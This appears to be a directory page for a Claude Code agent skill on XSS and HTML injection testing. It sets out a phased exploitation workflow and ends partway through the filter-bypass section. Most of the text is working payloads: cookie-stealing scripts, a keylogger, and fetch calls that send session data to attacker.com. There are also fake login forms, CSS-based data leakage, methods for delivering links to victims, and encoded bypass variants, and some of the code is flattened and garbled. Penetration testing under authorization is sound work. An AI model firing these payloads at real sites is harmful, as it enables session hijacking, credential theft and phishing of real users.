cross-site scripting and html injection testing

仓库: zebbern/claude-code-guide
安装量: 39
排名: #18381

安装

npx skills add https://github.com/sickn33/antigravity-awesome-skills --skill 'Cross-Site Scripting and HTML Injection Testing'

Cross-Site Scripting and HTML Injection Testing Purpose Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors. Inputs / Prerequisites Required Access Target web application URL with user input fields Burp Suite or browser developer tools for request analysis Access to create test accounts for stored XSS testing Browser with JavaScript console enabled Technical Requirements Understanding of JavaScript execution in browser context Knowledge of HTML DOM structure and manipulation Familiarity with HTTP request/response headers Understanding of cookie attributes and session management Legal Prerequisites Written authorization for security testing Defined scope including target domains and features Agreement on handling of any captured session data Incident response procedures established Outputs / Deliverables XSS/HTMLi vulnerability report with severity classifications Proof-of-concept payloads demonstrating impact Session hijacking demonstrations (controlled environment) Remediation recommendations with CSP configurations Core Workflow Phase 1: Vulnerability Detection Identify Input Reflection Points Locate areas where user input is reflected in responses:

Common injection vectors

  • Search boxes and query parameters
  • User profile fields (name, bio, comments)
  • URL fragments and hash values
  • Error messages displaying user input
  • Form fields with client-side validation only
  • Hidden form fields and parameters
  • HTTP headers (User-Agent, Referer) Basic Detection Testing Insert test strings to observe application behavior:

< test123

< script

alert ( 'XSS' ) </ script

Monitor for: Raw HTML reflection without encoding Partial encoding (some characters escaped) JavaScript execution in browser console DOM modifications visible in inspector Determine XSS Type Stored XSS Indicators: Input persists after page refresh Other users see injected content Content stored in database/filesystem Reflected XSS Indicators: Input appears only in current response Requires victim to click crafted URL No persistence across sessions DOM-Based XSS Indicators: Input processed by client-side JavaScript Server response doesn't contain payload Exploitation occurs entirely in browser Phase 2: Stored XSS Exploitation Identify Storage Locations Target areas with persistent user content: - Comment sections and forums - User profile fields (display name, bio, location) - Product reviews and ratings - Private messages and chat systems - File upload metadata (filename, description) - Configuration settings and preferences Craft Persistent Payloads < script > document . location = 'http://attacker.com/steal?c=' + document . cookie < script > document . onkeypress = function ( e ) { new Image ( ) . src = 'http://attacker.com/log?k=' + e . key ; } < script > fetch ( 'http://attacker.com/capture' , { method : 'POST' , body : JSON . stringify ( { cookies : document . cookie , url : location . href } ) } ) < div id = " login " > < h2 > Session Expired - Please Login < form action = " http://attacker.com/phish " method = " POST " > Username: < input name = " user " > < br > Password: < input type = " password " name = " pass " > < br > < input type = " submit " value = " Login " > Phase 3: Reflected XSS Exploitation Construct Malicious URLs Build URLs containing XSS payloads: # Basic reflected payload https://target.com/search?q= # URL-encoded payload https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E # Event handler in parameter https://target.com/page?name="> # Fragment-based (for DOM XSS) https://target.com/page# Delivery Methods Techniques for delivering reflected XSS to victims: 1. Phishing emails with crafted links 2. Social media message distribution 3. URL shorteners to obscure payload 4. QR codes encoding malicious URLs 5. Redirect chains through trusted domains Phase 4: DOM-Based XSS Exploitation Identify Vulnerable Sinks Locate JavaScript functions that process user input: // Dangerous sinks document . write ( ) document . writeln ( ) element . innerHTML element . outerHTML element . insertAdjacentHTML ( ) eval ( ) setTimeout ( ) setInterval ( ) Function ( ) location . href location . assign ( ) location . replace ( ) Identify Sources Locate where user-controlled data enters the application: // User-controllable sources location . hash location . search location . href document . URL document . referrer window . name postMessage data localStorage / sessionStorage DOM XSS Payloads // Hash-based injection https : / / target . com / page# < img src = x onerror = alert ( 1 ) > // URL parameter injection (processed client-side) https : / / target . com / page ? default = < script > alert ( 1 ) < / script > // PostMessage exploitation // On attacker page: < iframe src = "https://target.com/vulnerable" > < / iframe > < script > frames [ 0 ] . postMessage ( '' , '*' ) ; < / script > Phase 5: HTML Injection Techniques Reflected HTML Injection Modify page appearance without JavaScript: < h1 > SITE HACKED < form action = " http://attacker.com/capture " > < input name = " credentials " placeholder = " Enter password " > < button > Submit < style > input [ value ^= "a" ] { background : url ( http://attacker.com/a ) } input [ value ^= "b" ] { background : url ( http://attacker.com/b ) } < iframe src = " http://attacker.com/phishing " style = " position : absolute ; top : 0 ; left : 0 ; width : 100 % ; height : 100 % " > Stored HTML Injection Persistent content manipulation: < marquee > Important Security Notice: Your account is compromised! < style > body { background : red !important ; } < div style = " position : fixed ; top : 0 ; left : 0 ; width : 100 % ; background : white ; z-index : 9999 ; " > Fake login form or misleading content here Phase 6: Filter Bypass Techniques Tag and Attribute Variations < ScRiPt > alert ( 1 ) < IMG SRC = x ONERROR = alert ( 1 ) >
< video > < source onerror = alert ( 1 ) > < audio src = x onerror = alert ( 1 ) > < img src = x onerror = alert ( 1 ) // < script > alert ( 1 ) "> Encoding Bypass < img src = x onerror = & # 97 ; & # 108 ; & # 101 ; & # 114 ; & # 116 ; ( 1 ) > < img src = x onerror = & #x61 ; & #x6c ; & #x65 ; & #x72 ; & #x74 ; ( 1 ) > < script > \ u0061lert ( 1 ) < img src = x onerror = \u0061\ u006cert ( 1 ) > JavaScript Obfuscation // String concatenation < script > eval ( 'al' + 'ert(1)' ) < / script > // Template literals < script > alert ` 1 ` < / script > // Constructor execution < script > [ ] . constructor . constructor ( 'alert(1)' ) ( ) < / script > // Base64 encoding < script > eval ( atob ( 'YWxlcnQoMSk=' ) ) < / script > // Without parentheses < script > alert ` 1 ` < / script > < script > throw / a ] a ] / . source + onerror = alert < / script > Whitespace and Comment Bypass < img src = x onerror = alert ( 1 ) > < script > /**/ alert ( 1 ) /**/ < img src = x onerror = " alert ( 1 ) "